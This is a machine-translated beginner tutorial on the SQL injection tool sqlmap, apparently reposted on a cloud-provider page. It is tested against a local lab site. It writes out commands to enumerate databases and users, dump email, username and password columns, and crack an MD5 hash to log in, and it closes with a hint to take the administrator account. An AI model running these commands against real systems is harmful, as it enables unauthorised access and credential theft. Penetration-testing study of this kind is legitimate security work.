Penetration Testing Tools Sqlmap Basic Tutorials

Source: Internet
Author: User
Tags web database microsoft iis

This article is only dedicated to the study of penetration test sqlmap small white, Daniel please bypass.

>

>

For network security personnel, mastering the use of penetration tools is an essential skill. However, a no-teacher led by the small white at the beginning of the study, do not know how to start penetration learning, so this article is intended to help these small white primer.

Sqlmap is a very powerful open source SQL Automation injection tool that can be used to detect and exploit SQL injection vulnerabilities. It is developed by the Python language, so running requires a Python environment to be installed.


Now that this article is a basic tutorial, the following are the basics of how to use the tools.

This tutorial is for sqlmap specific application cases, if you need to know more sqlmap information can access the official http://sqlmap.org, or cloud Knowledge http://drops.wooyun.org/tips/401 and http:// drops.wooyun.org/tips/143.


Test environment: Locally built web site with SQL injection point http://192.168.1.150

Note: Sqlmap is only used to detect and exploit the SQL injection point, and can not scan the site of the vulnerabilities, use the scan tool before using to clear the SQL injection point.


Tutorial Start:

First, detection of the injection point is available

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134" </span>
Parameters:

-U: Specify the injection point URL

Results:



Injection results show:

(1) The injection parameter ID is get injection, the injection type has four kinds: boolean-based blind, error-based, stacked queries, inine query.

(2) Web Server System for Windows 2003 or XP

(3) Web application Technology: ASP. NET, Microsoft IIS 6.0

(4) database type: SQL Server 2000


There are several query statements in figure A, need user input [y/n], if you are too lazy to input or do not know how to input can let the program automatically input, just add a parameter, command as follows:

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--batch</span>

Second, Bauku

A single command exposes all database names in the SQL Server command as follows:

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--dbs</span>

Parameters:

There are two bars in front of the--dbs:dbs, please see clearly.

Results:


The results show that SQL Server contains 7 databases that are available.


Third, the database currently used by the Web

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--current-db</span>


Iv. use of the Web database account

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--current-user</span >



V. List all users of SQL Server

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--users</span>


Vi. Database account and password

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--passwords</span>


Vii. listing tables in a database

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata--tables</ Span>
Parameters:

-D: Specify the database name

--tables: List Tables

Results:



The results reflect a total of 34 tables.


Viii. listing fields in a table

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t UserB-- Columns</span>

Parameters:

-D: Specify the database name

-T: Specify a table to list fields

--columns: Specify list fields

Results:


The results show that the UserB table contains 23 fields.


Nine, the Storm field content

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t userb-c "email , Username,userpassword "--dump</span>
Parameters:

-C: Specify the field to be burst

--dump: Export the results

Results:


If the field is too much, it takes a lot of time. You can specify the export of a specific range of field content, with the following command:

<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t userb-c "email , Username,userpassword "--start 1--stop--dump</span>
Parameters:

--start: Specifies the starting line

--stop: Specifies the end of the line

The meaning of this command is: Export the data contents of rows 1th through 10th in the field (Email,username,userpassword) in table UserB in database Tourdata.

The results are as follows:




X. Verification of results

One of the user information that you see through the results is:

Email:[email protected]

Username:1.asp

password:49ba59abbe56e057

By MD5 decryption, the original password to get the hash is: 123456


Get the account password we will test whether you can log in, the results are as follows:


Verify success!

Of course, we just get the ordinary member account to log in, you can also get the Administrator account to log in, behind the things to play it, hey!

Penetration Testing Tools Sqlmap Basic Tutorials

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.